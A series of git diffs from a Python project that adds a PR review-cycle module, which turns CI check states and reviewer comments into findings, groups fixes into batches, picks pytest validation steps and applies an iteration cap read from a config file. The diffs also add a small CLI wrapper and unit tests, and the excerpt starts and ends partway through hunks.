         summary = body[:120].strip() or f"Inline review feedback from {commenter}."
 
         normalized_findings.append(
@@ -401,10 +421,7 @@ def _nearest_test_targets(finding: dict[str, Any], test_paths: list[str]) -> lis
 
     for source_path in _candidate_source_paths(finding):
         source_dir = str(PurePosixPath(source_path).parent)
-        if source_dir == ".":
-            source_dir = ""
-
-        current = PurePosixPath(source_dir) if source_dir else None
+        current: PurePosixPath | None = PurePosixPath(source_dir or ".")
         while current is not None:
             current_dir = "" if str(current) == "." else str(current)
             mirrored_prefix = f"tests/{current_dir}" if current_dir else ""
@@ -581,9 +598,13 @@ def classify_pr_loop_stop(
     actionable_count: int,
     iteration: int,
     *,
-    cap: int = DEFAULT_LOOP_CAP,
+    cap: int | None = None,
 ) -> dict[str, Any]:
-    """Classify whether the PR fix loop should stop and whether retagging is required."""
+    """Classify whether the PR fix loop should stop and whether retagging is required.
+
+    When ``cap`` is ``None`` the value is resolved from ``.ai/allowlist.json``
+    (``gates.max_fix_iterations``), falling back to ``FALLBACK_LOOP_CAP``.
+    """
 
     normalized_state = (ci_state or "").strip().lower()
     if normalized_state not in {"green", "failing", "pending", "unknown"}:
@@ -591,7 +612,8 @@ def classify_pr_loop_stop(
 
     actionable = max(0, int(actionable_count))
     current_iteration = max(0, int(iteration))
-    max_iterations = max(1, int(cap))
+    resolved_cap = cap if cap is not None else resolve_loop_cap()
+    max_iterations = max(1, int(resolved_cap))
 
     if normalized_state == "green" and actionable == 0 and current_iteration <= max_iterations:
         return {

--- a/scripts/quest_runtime/pr_review_cycle.py
+++ b/scripts/quest_runtime/pr_review_cycle.py
@@ -21,6 +21,15 @@ _BLOCKER_TOKEN_STRIP = ".,:;!?()[]{}\"'"
 FALLBACK_LOOP_CAP = 3
 _ALLOWLIST_PATH = Path(".ai/allowlist.json")
 CI_GREEN_STATES = ("green",)
+CI_FAILURE_STATES = (
+    "failing",
+    "failure",
+    "failed",
+    "error",
+    "cancelled",
+    "timed_out",
+    "action_required",
+)
 
 
 def resolve_loop_cap(allowlist_path: Path | None = None) -> int:
@@ -97,7 +106,10 @@ def normalize_pr_review_intake(intake: dict[str, list[dict[str, Any]]]) -> list[
     for check in ci_checks:
         job = str(check.get("job") or "unknown-job").strip() or "unknown-job"
         state = str(check.get("state") or "unknown").strip().lower() or "unknown"
-        if state in CI_GREEN_STATES:
+        if state not in CI_FAILURE_STATES:
+            # Skip green, pending, in-progress, unknown, and any other
+            # non-actionable state. Only confirmed failures become findings;
+            # transient/unknown states should not produce fix_now work.
             continue
 
         ci_counter += 1

--- a/scripts/quest_runtime/pr_review_cycle.py
+++ b/scripts/quest_runtime/pr_review_cycle.py
@@ -1,0 +1,651 @@
+"""PR review-cycle helpers for canonical intake, batching, validation, and stop logic."""
+
+from __future__ import annotations
+
+import copy
+from pathlib import Path, PurePosixPath
+from typing import Any
+
+from quest_runtime.review_intelligence import (
+    ALLOWED_DECISIONS,
+    _batch_from_finding,
+    merge_and_dedupe,
+    select_decision,
+    validate_findings,
+)
+
+INTAKE_SOURCES = ("ci_check", "inline_comment", "general_comment", "existing_finding")
+BLOCKER_KEYWORDS = ("blocker", "blocking", "critical")
+DEFAULT_LOOP_CAP = 3
+CI_GREEN_STATES = ("green",)
+
+_ACTIONABLE_DECISIONS = {"fix_now", "verify_first"}
+_SHARED_INFRA_KINDS = {"build_failure", "shared_infrastructure", "cross_cutting"}
+_SHARED_SCOPE_PREFIXES = ("scripts/quest_runtime/", ".skills/", "docs/architecture/")
+
+
+def _as_dict_list(value: Any, *, field_name: str) -> list[dict[str, Any]]:
+    if value is None:
+        return []
+    if not isinstance(value, list):
+        raise ValueError(f"'{field_name}' must be a list")
+    result: list[dict[str, Any]] = []
+    for index, entry in enumerate(value):
+        if not isinstance(entry, dict):
+            raise ValueError(f"'{field_name}[{index}]' must be an object")
+        result.append(entry)
+    return result
+
+
+def _first_200_chars(text: str) -> str:
+    return text[:200]
+
+
+def _finding_line(value: Any) -> int | None:
+    if isinstance(value, bool) or not isinstance(value, int) or value < 1:
+        return None
+    return value
+
+
+def _normalize_scope_entry(value: str) -> str:
+    trimmed = value.strip().strip("/")
+    if not trimmed:
+        return ""
+    return trimmed
+
+
+def normalize_pr_review_intake(intake: dict[str, list[dict[str, Any]]]) -> list[dict[str, Any]]:
+    """Normalize heterogeneous PR intake into canonical findings and merge existing findings."""
+
+    if not isinstance(intake, dict):
+        raise ValueError("intake must be an object")
+
+    ci_checks = _as_dict_list(intake.get("ci_checks"), field_name="ci_checks")
+    inline_comments = _as_dict_list(intake.get("inline_comments"), field_name="inline_comments")
+    general_comments = _as_dict_list(intake.get("general_comments"), field_name="general_comments")
+    existing_findings = _as_dict_list(intake.get("existing_findings"), field_name="existing_findings")
+
+    existing_errors = validate_findings(existing_findings)
+    if existing_errors:
+        raise ValueError("; ".join(existing_errors))
+
+    normalized_findings: list[dict[str, Any]] = []
+    ci_counter = 0
+    inline_counter = 0
+    general_counter = 0
+
+    for check in ci_checks:
+        job = str(check.get("job") or "unknown-job").strip() or "unknown-job"
+        state = str(check.get("state") or "unknown").strip().lower() or "unknown"
+        if state in CI_GREEN_STATES:
+            continue
+
+        ci_counter += 1
+        kind_hint = str(check.get("kind_hint") or "test_failure").strip()
+        if kind_hint not in {"test_failure", "build_failure"}:
+            kind_hint = "test_failure"
+
+        failed_path_raw = check.get("failed_path")
+        failed_path = (
+            str(failed_path_raw).strip()
+            if isinstance(failed_path_raw, str) and failed_path_raw.strip()
+            else ""
+        )
+        path = failed_path or "ci/unknown"
+        write_scope = [failed_path] if failed_path else []
+
+        normalized_findings.append(
+            {
+                "finding_id": f"pr-ci-{ci_counter:03d}",
+                "source": f"pr-ci:{job}",
+                "kind": kind_hint,
+                "severity": "high",
+                "confidence": "high",
+                "path": path,
+                "line": None,
+                "summary": f"CI check '{job}' reported state '{state}'.",
+                "why_it_matters": "A non-green CI check indicates unresolved build or test risk.",
+                "evidence": [f"ci:{job} state={state}"],
+                "action": "Fix the failing CI check.",
+                "needs_test": kind_hint == "test_failure",
+                "write_scope": write_scope,
+                "related_acceptance_criteria": [],
+            }
+        )
+
+    for comment in inline_comments:
+        inline_counter += 1
+        commenter = str(comment.get("commenter") or "unknown-reviewer").strip()
+        commenter = commenter or "unknown-reviewer"
+        body = str(comment.get("body") or "").strip()
+        path = str(comment.get("path") or "").strip() or "pr/inline"
+        line = _finding_line(comment.get("line"))
+        body_lower = body.lower()
+        severity = (
+            "high"
+            if any(keyword in body_lower for keyword in BLOCKER_KEYWORDS)
+            else "medium"
+        )
+        summary = body[:120].strip() or f"Inline review feedback from {commenter}."
+
+        normalized_findings.append(
+            {
+                "finding_id": f"pr-inline-{inline_counter:03d}",
+                "source": f"pr-inline:{commenter}",
+                "kind": "review_comment",
+                "severity": severity,
+                "confidence": "medium",
+                "path": path,
+                "line": line,
+                "summary": summary,
+                "why_it_matters": "Unaddressed inline feedback can leave review concerns unresolved.",
+                "evidence": [_first_200_chars(body)],
+                "action": "Address reviewer feedback.",
+                "needs_test": severity == "high",
+                "write_scope": [path],
+                "related_acceptance_criteria": [],
+            }
+        )
+
+    for comment in general_comments:
+        general_counter += 1
+        commenter = str(comment.get("commenter") or "unknown-reviewer").strip()
+        commenter = commenter or "unknown-reviewer"
+        body = str(comment.get("body") or "").strip()
+        summary = body[:120].strip() or f"General PR feedback from {commenter}."
+
+        normalized_findings.append(
+            {
+                "finding_id": f"pr-general-{general_counter:03d}",
+                "source": f"pr-general:{commenter}",
+                "kind": "review_comment",
+                "severity": "medium",
+                "confidence": "low",
+                "path": "pr/general",
+                "line": None,
+                "summary": summary,
+                "why_it_matters": "General PR comments can signal unresolved quality or scope concerns.",
+                "evidence": [_first_200_chars(body)],
+                "action": "Address reviewer feedback.",
+                "needs_test": False,
+                "write_scope": [],
+                "related_acceptance_criteria": [],
+            }
+        )
+
+    return merge_and_dedupe([normalized_findings, existing_findings])
+
+
+def _validation_steps_from_item(item: dict[str, Any]) -> list[dict[str, Any]]:
+    raw_steps = item.get("validation_steps")
+    if not isinstance(raw_steps, list):
+        return []
+
+    steps: list[dict[str, Any]] = []
+    for step in raw_steps:
+        if not isinstance(step, dict):
+            continue
+        level_raw = step.get("level")
+        level = level_raw if isinstance(level_raw, int) and not isinstance(level_raw, bool) else 0
+        target = str(step.get("target") or "").strip()
+        command = str(step.get("command") or "").strip()
+        steps.append({"level": level, "target": target, "command": command})
+    return steps
+
+
+def _validation_scope_signature(item: dict[str, Any]) -> tuple[tuple[int, str, str], ...]:
+    steps = _validation_steps_from_item(item)
+    return tuple((step["level"], step["target"], step["command"]) for step in steps)
+
+
+def _scope_entries(item: dict[str, Any]) -> list[str]:
+    raw_scope = item.get("write_scope")
+    if not isinstance(raw_scope, list):
+        return []
+    normalized: list[str] = []
+    for value in raw_scope:
+        if not isinstance(value, str):
+            continue
+        candidate = _normalize_scope_entry(value)
+        if candidate:
+            normalized.append(candidate)
+    return normalized
+
+
+def _path_is_prefix(prefix: str, candidate: str) -> bool:
+    return prefix == candidate or candidate.startswith(prefix + "/")
+
+
+def _write_scopes_overlap(scope_a: list[str], scope_b: list[str]) -> bool:
+    if not scope_a or not scope_b:
+        return False
+    for path_a in scope_a:
+        for path_b in scope_b:
+            if _path_is_prefix(path_a, path_b) or _path_is_prefix(path_b, path_a):
+                return True
+    return False
+
+
+def _min_finding_id(items: list[dict[str, Any]]) -> str:
+    if not items:
+        return ""
+    finding_ids = [str(item.get("finding_id") or "") for item in items]
+    return min(finding_ids)
+
+
+def build_fix_batches(backlog_items: list[dict[str, Any]]) -> list[dict[str, Any]]:
+    """Group actionable backlog items into deterministic non-overlapping fix batches."""
+
+    grouped: dict[
+        tuple[str, tuple[tuple[int, str, str], ...], str], list[dict[str, Any]]
+    ] = {}
+
+    for item in backlog_items:
+        if not isinstance(item, dict):
+            continue
+        decision = item.get("decision")
+        if decision not in _ACTIONABLE_DECISIONS:
+            continue
+
+        batch_key = _batch_from_finding(item)
+        signature = _validation_scope_signature(item)
+        unknown_scope_bucket = (
+            str(item.get("finding_id") or "") if not signature else ""
+        )
+        group_key = (batch_key, signature, unknown_scope_bucket)
+        grouped.setdefault(group_key, []).append(copy.deepcopy(item))
+
+    batches: list[dict[str, Any]] = []
+    for (batch_key, signature, _unknown_scope_bucket), items in grouped.items():
+        sorted_items = sorted(items, key=lambda value: str(value.get("finding_id") or ""))
+        partitions: list[list[dict[str, Any]]] = []
+
+        for item in sorted_items:
+            item_scope = _scope_entries(item)
+            placed = False
+            for partition in partitions:
+                if any(
+                    _write_scopes_overlap(item_scope, _scope_entries(existing))
+                    for existing in partition
+                ):
+                    continue
+                partition.append(item)
+                placed = True
+                break
+            if not placed:
+                partitions.append([item])
+
+        for index, partition in enumerate(partitions, start=1):
+            batch_id = batch_key if len(partitions) == 1 else f"{batch_key}-{index}"
+            batches.append(
+                {
+                    "batch_id": batch_id,
+                    "batch_key": batch_key,
+                    "validation_scope": [
+                        {"level": level, "target": target, "command": command}
+                        for (level, target, command) in signature
+                    ],
+                    "items": sorted(
+                        partition,
+                        key=lambda value: str(value.get("finding_id") or ""),
+                    ),
+                }
+            )
+
+    batches.sort(key=lambda batch: (str(batch["batch_key"]), _min_finding_id(batch["items"])))
+    return batches
+
+
+def _inventory_command(repo_inventory: dict[str, Any] | None, *keys: str) -> str | None:
+    if not isinstance(repo_inventory, dict):
+        return None
+
+    for key in keys:
+        value = repo_inventory.get(key)
+        if isinstance(value, str) and value.strip():
+            return value.strip()
+
+    commands = repo_inventory.get("commands")
+    if isinstance(commands, dict):
+        for key in keys:
+            value = commands.get(key)
+            if isinstance(value, str) and value.strip():
+                return value.strip()
+    return None
+
+
+def _repo_inventory_test_paths(repo_inventory: dict[str, Any] | None) -> list[str]:
+    if isinstance(repo_inventory, dict):
+        for key in ("test_paths", "tests", "test_inventory"):
+            value = repo_inventory.get(key)
+            if isinstance(value, list):
+                paths = [str(item).strip() for item in value if isinstance(item, str) and item.strip()]
+                if paths:
+                    return sorted(set(paths))
+
+    tests_dir = Path("tests")
+    if not tests_dir.exists():
+        return []
+    discovered = {
+        str(path.as_posix())
+        for path in tests_dir.rglob("*.py")
+        if path.name.startswith("test_") or path.name.endswith("_test.py")
+    }
+    return sorted(discovered)
+
+
+def _normalize_repo_path(path: str) -> str:
+    normalized = path.strip().replace("\\", "/")
+    if normalized.startswith("./"):
+        normalized = normalized[2:]
+    return normalized.rstrip("/")
+
+
+def _is_test_path(path: str) -> bool:
+    normalized = _normalize_repo_path(path)
+    name = PurePosixPath(normalized).name
+    return normalized.endswith(".py") and (
+        name.startswith("test_") or name.endswith("_test.py")
+    )
+
+
+def _candidate_source_paths(finding: dict[str, Any]) -> list[str]:
+    paths: list[str] = []
+    write_scope = finding.get("write_scope")
+    if isinstance(write_scope, list):
+        for raw in write_scope:
+            if isinstance(raw, str) and raw.strip():
+                paths.append(_normalize_repo_path(raw))
+
+    path_value = finding.get("path")
+    if isinstance(path_value, str) and path_value.strip():
+        paths.append(_normalize_repo_path(path_value))
+
+    unique: list[str] = []
+    seen: set[str] = set()
+    for path in paths:
+        if path not in seen:
+            seen.add(path)
+            unique.append(path)
+    return unique
+
+
+def _explicit_test_targets(finding: dict[str, Any]) -> list[str]:
+    targets: list[str] = []
+    suggested = finding.get("suggested_test")
+    if isinstance(suggested, str) and suggested.strip():
+        targets.append(_normalize_repo_path(suggested))
+
+    for path in _candidate_source_paths(finding):
+        if _is_test_path(path):
+            targets.append(path)
+
+    unique: list[str] = []
+    seen: set[str] = set()
+    for target in targets:
+        if target and target not in seen:
+            seen.add(target)
+            unique.append(target)
+    return unique
+
+
+def _nearest_test_targets(finding: dict[str, Any], test_paths: list[str]) -> list[str]:
+    normalized_test_paths = [_normalize_repo_path(path) for path in test_paths]
+    by_dir: dict[str, list[str]] = {}
+    for test_path in normalized_test_paths:
+        directory = str(PurePosixPath(test_path).parent)
+        by_dir.setdefault(directory, []).append(test_path)
+
+    for paths in by_dir.values():
+        paths.sort()
+
+    for source_path in _candidate_source_paths(finding):
+        source_dir = str(PurePosixPath(source_path).parent)
+        if source_dir == ".":
+            source_dir = ""
+
+        current = PurePosixPath(source_dir) if source_dir else None
+        while current is not None:
+            current_dir = "" if str(current) == "." else str(current)
+            mirrored_prefix = f"tests/{current_dir}" if current_dir else ""
+            if mirrored_prefix:
+                mirrored_matches = [
+                    path
+                    for path in normalized_test_paths
+                    if path.startswith(mirrored_prefix + "/")
+                ]
+                mirrored_matches = [
+                    path for path in mirrored_matches if _is_test_path(path)
+                ]
+                if mirrored_matches:
+                    return sorted(set(mirrored_matches))
+
+            same_dir_matches = [
+                path for path in by_dir.get(current_dir or ".", []) if _is_test_path(path)
+            ]
+            if same_dir_matches:
+                return sorted(set(same_dir_matches))
+
+            parent = current.parent
+            if parent == current or str(parent) == ".":
+                break
+            current = parent
+
+    return []
+
+
+def _scope_intersects_shared_boundary(scope_path: str) -> bool:
+    normalized = _normalize_repo_path(scope_path)
+    if not normalized:
+        return False
+    if any(
+        normalized == prefix.rstrip("/") or normalized.startswith(prefix)
+        for prefix in _SHARED_SCOPE_PREFIXES
+    ):
+        return True
+    if normalized.startswith("src/"):
+        remainder = normalized[len("src/") :].strip("/")
+        return bool(remainder) and "/" not in remainder
+    return False
+
+
+def select_validation_steps(
+    finding: dict[str, Any],
+    *,
+    repo_inventory: dict[str, Any] | None = None,
+) -> list[dict[str, Any]]:
+    """Select ordered validation steps for one finding."""
+
+    errors = validate_findings([finding])
+    if errors:
+        raise ValueError("; ".join(errors))
+
+    steps: list[dict[str, Any]] = []
+    has_inventory = isinstance(repo_inventory, dict)
+    pytest_cmd = _inventory_command(repo_inventory, "pytest_command", "pytest") or "python3 -m pytest"
+
+    level0_config = (
+        ("format", "format_command"),
+        ("lint", "lint_command"),
+        ("typecheck", "typecheck_command"),
+    )
+    for guard_name, command_key in level0_config:
+        command = _inventory_command(repo_inventory, command_key, guard_name)
+        if command:
+            reason = f"Level 0 {guard_name} guard from repo inventory."
+        elif has_inventory:
+            command = "true"
+            reason = (
+                f"Level 0 {guard_name} guard configured as passthrough because repo "
+                "inventory does not declare a command."
+            )
+        else:
+            command = "true"
+            reason = (
+                f"Level 0 {guard_name} guard configured as passthrough because repo "
+                "inventory is unavailable."
+            )
+        steps.append(
+            {"level": 0, "target": ".", "command": command, "reason": reason}
+        )
+
+    level1_found = False
+    explicit_targets = _explicit_test_targets(finding)
+    if explicit_targets:
+        for target in explicit_targets:
+            steps.append(
+                {
+                    "level": 1,
+                    "target": target,
+                    "command": f"{pytest_cmd} {target}",
+                    "reason": "Level 1 selected from explicit test target on the finding.",
+                }
+            )
+        level1_found = True
+    else:
+        test_paths = _repo_inventory_test_paths(repo_inventory)
+        nearest_targets = _nearest_test_targets(finding, test_paths)
+        if nearest_targets:
+            for target in nearest_targets:
+                steps.append(
+                    {
+                        "level": 1,
+                        "target": target,
+                        "command": f"{pytest_cmd} {target}",
+                        "reason": "Level 1 selected nearest mirrored/sibling tests.",
+                    }
+                )
+            level1_found = True
+        else:
+            module_target = (
+                _inventory_command(
+                    repo_inventory,
+                    "module_tests_target",
+                    "module_test_target",
+                )
+                or "tests/unit/"
+            )
+            steps.append(
+                {
+                    "level": 1,
+                    "target": module_target,
+                    "command": f"{pytest_cmd} {module_target}",
+                    "reason": "Level 1 fell back to module-level tests because no nearer tests were found.",
+                }
+            )
+            level1_found = True
+
+    finding_kind = str(finding.get("kind") or "").strip().lower()
+    write_scope = _scope_entries(finding)
+    shared_boundary_flag = finding.get("shared_boundary") is True
+    shared_scope_trigger = any(
+        _scope_intersects_shared_boundary(path) for path in write_scope
+    )
+    missing_level1_with_test_need = bool(finding.get("needs_test")) and not level1_found
+
+    if (
+        finding_kind in _SHARED_INFRA_KINDS
+        or shared_scope_trigger
+        or shared_boundary_flag
+        or missing_level1_with_test_need
+    ):
+        level2_target = _inventory_command(
+            repo_inventory, "level2_tests_target", "level2_target"
+        ) or "tests/"
+        level2_command = _inventory_command(
+            repo_inventory, "level2_command", "broad_test_command"
+        ) or f"{pytest_cmd} {level2_target}"
+
+        trigger_reason = "shared-scope changes"
+        if finding_kind in _SHARED_INFRA_KINDS:
+            trigger_reason = "shared infrastructure kind"
+        elif shared_boundary_flag:
+            trigger_reason = "explicit shared boundary flag"
+        elif missing_level1_with_test_need:
+            trigger_reason = "needs_test with no level-1 tests found"
+
+        steps.append(
+            {
+                "level": 2,
+                "target": level2_target,
+                "command": level2_command,
+                "reason": f"Level 2 selected due to {trigger_reason}.",
+            }
+        )
+
+    return steps
+
+
+def classify_pr_loop_stop(
+    ci_state: str,
+    actionable_count: int,
+    iteration: int,
+    *,
+    cap: int = DEFAULT_LOOP_CAP,
+) -> dict[str, Any]:
+    """Classify whether the PR fix loop should stop and whether retagging is required."""
+
+    normalized_state = (ci_state or "").strip().lower()
+    if normalized_state not in {"green", "failing", "pending", "unknown"}:
+        normalized_state = "unknown"
+
+    actionable = max(0, int(actionable_count))
+    current_iteration = max(0, int(iteration))
+    max_iterations = max(1, int(cap))
+
+    if normalized_state == "green" and actionable == 0 and current_iteration <= max_iterations:
+        return {
+            "stop": True,
+            "outcome": "success",
+            "reason": "CI is green and no actionable backlog items remain.",
+            "retag_required": False,
+        }
+
+    if current_iteration >= max_iterations:
+        retag_required = actionable > 0
+        reason = "Iteration cap reached; enforce loop cap policy."
+        if current_iteration > max_iterations:
+            reason = "Iteration cap exceeded; enforce loop cap policy."
+        if retag_required:
+            reason += " Actionable findings must be retagged."
+        return {
+            "stop": True,
+            "outcome": "cap_enforced",
+            "reason": reason,
+            "retag_required": retag_required,
+        }
+
+    return {
+        "stop": False,
+        "outcome": "continue",
+        "reason": "Continue loop: CI/actionable state has not met a stop condition.",
+        "retag_required": False,
+    }
+
+
+def retag_backlog_at_cap(backlog: dict[str, Any]) -> dict[str, Any]:
+    """Retag actionable backlog entries using loop-cap decision policy."""
+
+    if not isinstance(backlog, dict):
+        raise ValueError("backlog must be an object")
+
+    items = backlog.get("items")
+    if not isinstance(items, list):
+        raise ValueError("backlog.items must be a list")
+
+    counts = {decision: 0 for decision in ALLOWED_DECISIONS}
+
+    for item in items:
+        if not isinstance(item, dict):
+            continue
+        if item.get("decision") in _ACTIONABLE_DECISIONS:
+            decision_fields = select_decision(item, at_loop_cap=True)
+            item.update(decision_fields)
+
+        decision = item.get("decision")
+        if isinstance(decision, str) and decision in counts:
+            counts[decision] += 1
+
+    backlog["counts"] = counts
+    backlog["at_loop_cap"] = True
+    return backlog

--- a/scripts/quest_runtime/pr_review_cycle.py
+++ b/scripts/quest_runtime/pr_review_cycle.py
@@ -46,10 +46,13 @@ def allowlist_path_from_context(context_path: Path | None) -> Path:
     if context_path is None:
         return _ALLOWLIST_PATH
     try:
-        resolved_parents = context_path.resolve().parents
+        resolved = context_path.resolve()
     except (OSError, RuntimeError):
         return _ALLOWLIST_PATH
-    for ancestor in resolved_parents:
+    # Include the resolved path itself in the candidate chain so passing a
+    # directory (e.g. the repo root) finds .ai/allowlist.json at that level,
+    # not only under ancestors above it.
+    for ancestor in [resolved, *resolved.parents]:
         candidate = ancestor / ".ai" / "allowlist.json"
         if candidate.exists():
             return candidate

--- a/scripts/quest_select_tests.py
+++ b/scripts/quest_select_tests.py
@@ -1,0 +1,63 @@
+"""CLI helper for selecting validation steps for one canonical finding."""
+
+from __future__ import annotations
+
+import argparse
+import json
+import sys
+from pathlib import Path
+from typing import Any
+
+from quest_runtime.pr_review_cycle import select_validation_steps
+
+
+def _load_json(path: Path) -> Any:
+    return json.loads(path.read_text(encoding="utf-8"))
+
+
+def _write_json(path: Path, payload: Any) -> None:
+    path.parent.mkdir(parents=True, exist_ok=True)
+    path.write_text(json.dumps(payload, indent=2, sort_keys=True) + "\n", encoding="utf-8")
+
+
+def parse_args() -> argparse.Namespace:
+    parser = argparse.ArgumentParser(description=__doc__)
+    parser.add_argument("--finding", required=True, help="Path to single finding JSON object")
+    parser.add_argument(
+        "--repo-inventory",
+        default=None,
+        help="Optional repository inventory JSON object path",
+    )
+    parser.add_argument("--output", default=None, help="Optional output path for validation steps JSON")
+    return parser.parse_args()
+
+
+def main() -> int:
+    args = parse_args()
+    try:
+        finding_payload = _load_json(Path(args.finding))
+        if not isinstance(finding_payload, dict):
+            raise ValueError("finding JSON must be an object")
+
+        repo_inventory: dict[str, Any] | None = None
+        if args.repo_inventory:
+            inventory_payload = _load_json(Path(args.repo_inventory))
+            if not isinstance(inventory_payload, dict):
+                raise ValueError("repo inventory JSON must be an object")
+            repo_inventory = inventory_payload
+
+        validation_steps = select_validation_steps(
+            finding_payload,
+            repo_inventory=repo_inventory,
+        )
+        if args.output:
+            _write_json(Path(args.output), validation_steps)
+        print(json.dumps(validation_steps, sort_keys=True))
+        return 0
+    except ValueError as exc:
+        print(json.dumps({"ok": False, "error": str(exc)}, sort_keys=True), file=sys.stderr)
+        return 1
+
+
+if __name__ == "__main__":
+    raise SystemExit(main())

--- a/scripts/quest_validate-manifest.sh
+++ b/scripts/quest_validate-manifest.sh
@@ -51,6 +51,8 @@ EXPECTED_PATTERNS=(
   "scripts/quest_claude_bridge.py"
   "scripts/quest_claude_probe.py"
   "scripts/quest_claude_runner.py"
+  "scripts/quest_review_intelligence.py"
+  "scripts/quest_select_tests.py"
   "scripts/quest_startup_branch.py"
   "scripts/quest_validate-handoff-contracts.sh"
   "scripts/quest_validate-manifest.sh"

--- a/tests/unit/test_pr_review_cycle.py
+++ b/tests/unit/test_pr_review_cycle.py
@@ -196,13 +196,20 @@ def test_build_fix_batches_detects_parent_child_prefix_overlap() -> None:
         ),
         _backlog_item(
             "F-002",
-            write_scope=["scripts/quest_runtime/pr_review_cycle.py"],
+            write_scope=[
+                "scripts/quest_runtime",
+                "scripts/quest_runtime/pr_review_cycle.py",
+            ],
             validation_steps=_validation_step("tests/unit/test_one.py"),
         ),
     ]
 
     batches = build_fix_batches(items)
     assert len(batches) == 2
+    assert {batch["batch_id"] for batch in batches} == {
+        "scripts/quest_runtime-1",
+        "scripts/quest_runtime-2",
+    }
 
 
 def test_build_fix_batches_normalizes_trailing_slash_for_overlap() -> None:
@@ -214,13 +221,20 @@ def test_build_fix_batches_normalizes_trailing_slash_for_overlap() -> None:
         ),
         _backlog_item(
             "F-002",
-            write_scope=["scripts/quest_runtime/pr_review_cycle.py"],
+            write_scope=[
+                "scripts/quest_runtime/",
+                "scripts/quest_runtime/pr_review_cycle.py",
+            ],
             validation_steps=_validation_step("tests/unit/test_one.py"),
         ),
     ]
 
     batches = build_fix_batches(items)
     assert len(batches) == 2
+    assert {batch["batch_id"] for batch in batches} == {
+        "scripts/quest_runtime/-1",
+        "scripts/quest_runtime/-2",
+    }
 
 
 def test_build_fix_batches_is_deterministic_for_shuffled_input() -> None:
@@ -461,3 +475,95 @@ def test_cli_classify_pr_stop_round_trip(tmp_path: Path) -> None:
     assert deferred_path.exists()
     first_record = json.loads(deferred_path.read_text(encoding="utf-8").splitlines()[0])
     assert first_record["deferred_by_quest"] == quest_id
+
+
+def test_normalize_pr_review_intake_tokenized_blocker_upgrade() -> None:
+    intake = {
+        "inline_comments": [
+            {
+                "commenter": "alice",
+                "body": "Happy to ship this; its a nonblocking improvement.",
+                "path": "scripts/foo.py",
+                "line": 10,
+            },
+            {
+                "commenter": "bob",
+                "body": "This is a blocker: session can leak.",
+                "path": "scripts/foo.py",
+                "line": 20,
+            },
+            {
+                "commenter": "carol",
+                "body": "Absolutely critical! Fix before merge.",
+                "path": "scripts/foo.py",
+                "line": 30,
+            },
+        ]
+    }
+
+    findings = normalize_pr_review_intake(intake)
+    by_commenter = {finding["source"]: finding for finding in findings}
+
+    assert by_commenter["pr-inline:alice"]["severity"] == "medium"
+    assert by_commenter["pr-inline:bob"]["severity"] == "high"
+    assert by_commenter["pr-inline:carol"]["severity"] == "high"
+
+
+def test_classify_pr_loop_stop_resolves_cap_from_allowlist(tmp_path: Path, monkeypatch: pytest.MonkeyPatch) -> None:
+    allowlist = tmp_path / "allowlist.json"
+    allowlist.write_text(
+        json.dumps({"gates": {"max_fix_iterations": 5}}),
+        encoding="utf-8",
+    )
+    monkeypatch.setattr(
+        "quest_runtime.pr_review_cycle._ALLOWLIST_PATH",
+        allowlist,
+    )
+
+    assert classify_pr_loop_stop("failing", 1, 3)["outcome"] == "continue"
+    assert classify_pr_loop_stop("failing", 1, 5)["outcome"] == "cap_enforced"
+
+
+def test_classify_pr_loop_stop_falls_back_to_fallback_cap_when_allowlist_missing(
+    tmp_path: Path, monkeypatch: pytest.MonkeyPatch
+) -> None:
+    monkeypatch.setattr(
+        "quest_runtime.pr_review_cycle._ALLOWLIST_PATH",
+        tmp_path / "does-not-exist.json",
+    )
+
+    assert classify_pr_loop_stop("failing", 1, 2)["outcome"] == "continue"
+    assert classify_pr_loop_stop("failing", 1, 3)["outcome"] == "cap_enforced"
+
+
+def test_select_validation_steps_finds_root_level_nearest_tests() -> None:
+    from quest_runtime.pr_review_cycle import select_validation_steps
+
+    finding = {
+        "finding_id": "F-root",
+        "source": "reviewer",
+        "kind": "correctness",
+        "severity": "medium",
+        "confidence": "medium",
+        "path": "setup.py",
+        "line": 1,
+        "summary": "Root-level module gets nearest-test lookup.",
+        "why_it_matters": "Root-level files should not silently skip Level 1.",
+        "evidence": ["repro"],
+        "action": "Verify near-test resolution for root path.",
+        "needs_test": False,
+        "write_scope": ["setup.py"],
+        "related_acceptance_criteria": [],
+    }
+
+    inventory = {
+        "format_command": "fmt",
+        "lint_command": "lint",
+        "typecheck_command": "typecheck",
+        "pytest_command": "pytest",
+        "test_paths": ["test_setup.py", "tests/unit/test_other.py"],
+    }
+
+    steps = select_validation_steps(finding, repo_inventory=inventory)
+    level1 = [step for step in steps if step["level"] == 1]
+    assert any("test_setup.py" in step["target"] for step in level1), steps

--- a/tests/unit/test_pr_review_cycle.py
+++ b/tests/unit/test_pr_review_cycle.py
@@ -770,3 +770,17 @@ def test_cli_classify_pr_stop_honors_backlog_repo_allowlist_from_unrelated_cwd(
     assert result.returncode == 0, result.stderr
     payload = json.loads(result.stdout)
     assert payload["outcome"] == "continue", payload
+
+
+def test_allowlist_path_from_context_accepts_repo_root_directory(tmp_path: Path) -> None:
+    from quest_runtime.pr_review_cycle import allowlist_path_from_context
+
+    repo = tmp_path / "repo"
+    (repo / ".ai").mkdir(parents=True)
+    allowlist = repo / ".ai" / "allowlist.json"
+    allowlist.write_text(json.dumps({"gates": {"max_fix_iterations": 9}}), encoding="utf-8")
+
+    # Passing the repo root directory itself should discover the allowlist at
+    # <repo>/.ai/allowlist.json, not skip past the repo root and fall back
+    # to cwd.
+    assert allowlist_path_from_context(repo) == allowlist

--- a/tests/unit/test_pr_review_cycle.py
+++ b/tests/unit/test_pr_review_cycle.py
@@ -784,3 +784,216 @@ def test_allowlist_path_from_context_accepts_repo_root_directory(tmp_path: Path)
     # <repo>/.ai/allowlist.json, not skip past the repo root and fall back
     # to cwd.
     assert allowlist_path_from_context(repo) == allowlist
+
+
+def test_canonical_pipeline_order_yields_multi_item_batches(tmp_path: Path) -> None:
+    """Reproduces the bug caught on PR #94: build-fix-batches before
+    select-batch-validation forces one-item batches by bucketing
+    items with missing validation_steps by finding_id.
+
+    After the fix, running select-batch-validation populates real
+    validation signatures on actionable items so build-fix-batches
+    can group two non-overlapping items under one batch.
+    """
+
+    script = Path(__file__).resolve().parents[2] / "scripts" / "quest_review_intelligence.py"
+
+    backlog_path = tmp_path / "review_backlog.json"
+    batches_path = tmp_path / "fix_batches.json"
+    inventory_path = tmp_path / "repo_inventory.json"
+    inventory_path.write_text(
+        json.dumps(
+            {
+                "format_command": "ruff format",
+                "lint_command": "ruff check",
